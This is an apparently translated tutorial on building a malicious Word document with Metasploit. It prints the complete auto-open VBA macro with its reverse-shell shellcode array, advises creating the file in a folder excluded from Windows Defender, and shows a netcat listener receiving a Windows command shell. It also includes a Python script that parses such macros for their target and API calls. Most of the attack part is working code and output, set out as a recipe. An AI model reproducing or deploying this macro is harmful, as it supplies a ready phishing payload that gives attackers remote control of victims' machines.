Creating a Word document that launches a connect-back shell with Metasploit

In "Creating a Word document that launches the calculator", a simple VBA macro was used to build a Word document that starts the calculator. Because VBA macros can call Win32 APIs, a macro can be written that executes arbitrary shellcode. Here, Metasploit Framework is used to build a Word document that launches a connect-back (reverse) shell.

Environment

Kali Linux 2.0, Metasploit Framework 4.11.4

root@vm-kali64:~# uname -a
Linux vm-kali64 4.0.0-kali1-amd64 #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) x86_64 GNU/Linux

root@vm-kali64:~# lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux 2.0
Release:        2.0
Codename:       sana

root@vm-kali64:~# msfconsole -v
Framework Version: 4.11.4-2015071403

Generating a VBA macro with Metasploit

Metasploit offers VBA as one of its shellcode output formats, and the result can be used as an Office macro as-is.

First, use the msfvenom command to find the payload name and the options it accepts.

root@vm-kali64:~# msfvenom --help
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

root@vm-kali64:~# msfvenom -l

Framework Payloads (432 total)
==============================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    ...
    windows/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
    ...

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp --payload-options
Options for payload/windows/shell_reverse_tcp:


       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 324
       Rank: Normal

Provided by:
    vlad902 <vlad902@gmail.com>
    sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell


Advanced options for payload/windows/shell_reverse_tcp:
(snip)

Based on what was found above, generating a VBA macro that connects back to port 4444 on 192.168.56.4 looks like this.

root@vm-kali64:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=4444 EXITFUNC=thread -f vba
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
#If Vba7 Then
        Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As LongPtr, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As LongPtr
        Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As LongPtr
        Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As LongPtr, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As LongPtr
#Else
        Private Declare Function CreateThread Lib "kernel32" (ByVal Jtr As Long, ByVal Xerhfbvq As Long, ByVal Bumokvf As Long, Weldl As Long, ByVal Dxjc As Long, Xmf As Long) As Long
        Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gowjdhnce As Long, ByVal Hslz As Long, ByVal Cgxo As Long, ByVal Kftmzpye As Long) As Long
        Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Ypdzzkr As Long, ByRef Cnrpsnfhk As Any, ByVal Nrpb As Long) As Long
#EndIf

Sub Auto_Open()
        Dim Ewtoup As Long, Qkhfci As Variant, Kdhhfhp As Long
#If Vba7 Then
        Dim  Hhluw As LongPtr, Lgcpy As LongPtr
#Else
        Dim  Hhluw As Long, Lgcpy As Long
#EndIf
        Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _
83,255,213)

        Hhluw = VirtualAlloc(0, UBound(Qkhfci), &H1000, &H40)
        For Kdhhfhp = LBound(Qkhfci) To UBound(Qkhfci)
                Ewtoup = Qkhfci(Kdhhfhp)
                Lgcpy = RtlMoveMemory(Hhluw + Kdhhfhp, Ewtoup, 1)
        Next Kdhhfhp
        Lgcpy = CreateThread(0, 0, Hhluw, 0, 0, 0)
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub

Of the output above, everything from #If Vba7 Then onward is the generated macro. It runs when the document is opened: the three entry points AutoOpen (Word), Auto_Open and Workbook_Open (Excel) all call the same routine, so the macro fires on open in either application. Concretely, VirtualAlloc allocates a buffer (&H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE; the requested size UBound(Qkhfci) is one byte short of the array length, which is harmless because the allocation is rounded up to a whole page), RtlMoveMemory copies the shellcode into it one byte at a time, and CreateThread runs it on a new thread. Note that EXITFUNC=thread is specified at generation time: with the default EXITFUNC=process, the shellcode ends by terminating the Word process itself once the shell exits, whereas with thread only the shellcode's own thread exits and Word keeps running. Two further details are worth knowing. First, the shellcode's connect loop (the push 5 just before the sockaddr pushes is the retry counter) gives up after five failed connections and calls ExitProcess regardless of EXITFUNC, so Word will close if the listener is not up when the document is opened. Second, the Array(...) holds 323 entries although msfvenom reported a 324-byte payload: the leading 0xFC (the cld that opens Metasploit's x86 Windows shellcode) is missing from the VBA output. This does not matter in practice, because the direction flag is already clear on entry to a new thread under the Win32 ABI, and the shell still comes back as shown below.
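As an added check (this script is not part of the original post and is not Metasploit code), the following Python takes msfvenom's -f vba output, recovers the raw shellcode from the Array(...) literal, and reports what a practitioner would want to verify before embedding it: the byte count against the reported payload size, whether the standard block_api prologue is intact, the Win32 APIs the shellcode resolves (by matching each push <hash>; call ebp sequence against the ROR13 hashes used by Metasploit's x86 Windows stubs), the exit technique, and the LHOST/LPORT encoded in the sockaddr pushes. The sample input is the Payload size line and the Qkhfci array copied from the output above; the hash table and the byte patterns are assumptions drawn from Metasploit's block_api, block_reverse_tcp and block_exitfunk stubs, not from anything on this page, and the "process" and "unknown" branches of exit_technique are not exercised by this sample.

```python
import re

# Sample input: the "Payload size" line and the Qkhfci array copied from the
# msfvenom -f vba output above (the rest of that output is omitted).
MSFVENOM_OUTPUT = """\
Payload size: 324 bytes
        Qkhfci = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1, _
199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81, _
139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _
207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36, _
1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36, _
91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0, _
0,104,119,115,50,95,84,104,76,119,38,7,255,213,184,144,1,0,0,41, _
196,84,80,104,41,128,107,0,255,213,80,80,80,80,64,80,64,80,104,234, _
15,223,224,255,213,151,106,5,104,192,168,56,4,104,2,0,17,92,137,230, _
106,16,86,87,104,153,165,116,97,255,213,133,192,116,12,255,78,8,117,236, _
104,240,181,162,86,255,213,104,99,109,100,0,137,227,87,87,87,49,246,106, _
18,89,86,226,253,102,199,68,36,60,1,1,141,68,36,16,198,0,68,84, _
80,86,86,86,70,86,78,86,86,83,86,104,121,204,63,134,255,213,137,224, _
78,86,70,255,48,104,8,135,29,96,255,213,187,224,29,42,10,104,166,149, _
189,157,255,213,60,6,124,10,128,251,224,117,5,187,71,19,114,111,106,0, _
83,255,213)
"""

# ROR13 API hashes used by Metasploit's x86 Windows block_api stub (assumed from
# the block_reverse_tcp / block_exitfunk sources, not taken from this page).
BLOCK_API_HASHES = {
    0x0726774C: "LoadLibraryA", 0x006B8029: "WSAStartup", 0xE0DF0FEA: "WSASocketA",
    0x6174A599: "connect", 0x56A2B5F0: "ExitProcess", 0x863FCC79: "CreateProcessA",
    0x601D8708: "WaitForSingleObject", 0x9DBD95A6: "GetVersion",
    0x0A2A1DE0: "ExitThread", 0x6F721347: "RtlExitUserThread",
}


def parse_vba_array(text):
    """Recover the raw shellcode from the Array(...) literal in msfvenom's -f vba output."""
    m = re.search(r"Array\((.*?)\)", text, re.S)
    if m is None:
        raise ValueError("no Array(...) literal found")
    body = m.group(1).replace("_", "")  # drop VBA line-continuation markers
    return bytes(int(tok) for tok in body.split(",") if tok.strip())


def reported_payload_size(text):
    """The byte count msfvenom printed, to compare against the array length."""
    m = re.search(r"Payload size: (\d+) bytes", text)
    return int(m.group(1)) if m else None


def prologue_state(sc):
    """Metasploit's x86 shellcode opens with 'cld; call $+0x87' (fc e8 82 00 00 00)."""
    if sc.startswith(b"\xfc\xe8\x82\x00\x00\x00"):
        return "complete"
    if sc.startswith(b"\xe8\x82\x00\x00\x00"):
        return "missing cld"
    return "not block_api"


def _name(h):
    return BLOCK_API_HASHES.get(h, "0x%08x" % h)


def api_calls(sc):
    """APIs invoked through 'push <hash>; call ebp' (68 xx xx xx xx ff d5), in stream order."""
    return [_name(int.from_bytes(m.group(1), "little"))
            for m in re.finditer(rb"\x68(.{4})\xff\xd5", sc, re.S)]


def exit_technique(sc):
    """EXITFUNC=thread loads the ExitThread hash into ebx ('mov ebx, imm32', bb xx xx xx xx)
    ahead of the final 'push 0; push ebx; call ebp'; otherwise look at the last API called."""
    ebx_loads = [_name(int.from_bytes(m.group(1), "little"))
                 for m in re.finditer(rb"\xbb(.{4})", sc, re.S)]
    if "ExitThread" in ebx_loads:
        return "thread"
    calls = api_calls(sc)
    if calls and calls[-1] == "ExitProcess":
        return "process"
    return "unknown"


def find_reverse_tcp_target(sc):
    """block_reverse_tcp pushes sockaddr_in as two dwords, the host and then AF_INET (2)
    with the port in network byte order, followed by 'mov esi, esp' (89 e6)."""
    m = re.search(rb"\x68(.{4})\x68\x02\x00(.{2})\x89\xe6", sc, re.S)
    if m is None:
        return None
    host = ".".join(str(b) for b in m.group(1))
    port = int.from_bytes(m.group(2), "big")
    return host, port


def analyze(text):
    """Full report for one msfvenom -f vba output."""
    sc = parse_vba_array(text)
    return {
        "array_bytes": len(sc),
        "reported_size": reported_payload_size(text),
        "prologue": prologue_state(sc),
        "api_calls": api_calls(sc),
        "exitfunc": exit_technique(sc),
        "target": find_reverse_tcp_target(sc),
    }


if __name__ == "__main__":
    for key, value in analyze(MSFVENOM_OUTPUT).items():
        print(f"{key}: {value}")
```

Run against the output above, the report shows 323 array bytes against a reported size of 324 with the prologue flagged as "missing cld", the API sequence LoadLibraryA, WSAStartup, WSASocketA, connect, ExitProcess (the connect-failure path), CreateProcessA, WaitForSingleObject, GetVersion, an exit technique of thread, and a connect-back target of 192.168.56.4:4444, which is exactly what the LHOST, LPORT and EXITFUNC arguments asked for. The same functions work on a macro pulled out of a suspicious document, where the target and API list are the first things an analyst wants.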

Creating a Word document with the macro embedded

Create a Word document containing the macro above in the same way as in "Creating a Word document that launches the calculator". Note that Windows Defender detects this file as TrojanDownloader:O97M/Donoff.gen!A, so it has to be created inside a folder that is excluded from Windows Defender.

With nc listening on port 4444 of 192.168.56.4, opening the Word document and enabling macros produces the following.

root@vm-kali64:~# nc -v -l -p 4444
listening on [any] 4444 ...
192.168.56.1: inverse host lookup failed: Unknown host
connect to [192.168.56.4] from (UNKNOWN) [192.168.56.1] 58116
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>whoami
whoami
target-win8\user

C:\Users\user\Desktop>^C

The output above confirms that the command prompt of the machine that opened the Word document can be driven remotely. The shell is a cmd.exe spawned by the Word process, running as the user who opened the document (target-win8\user above).

Related links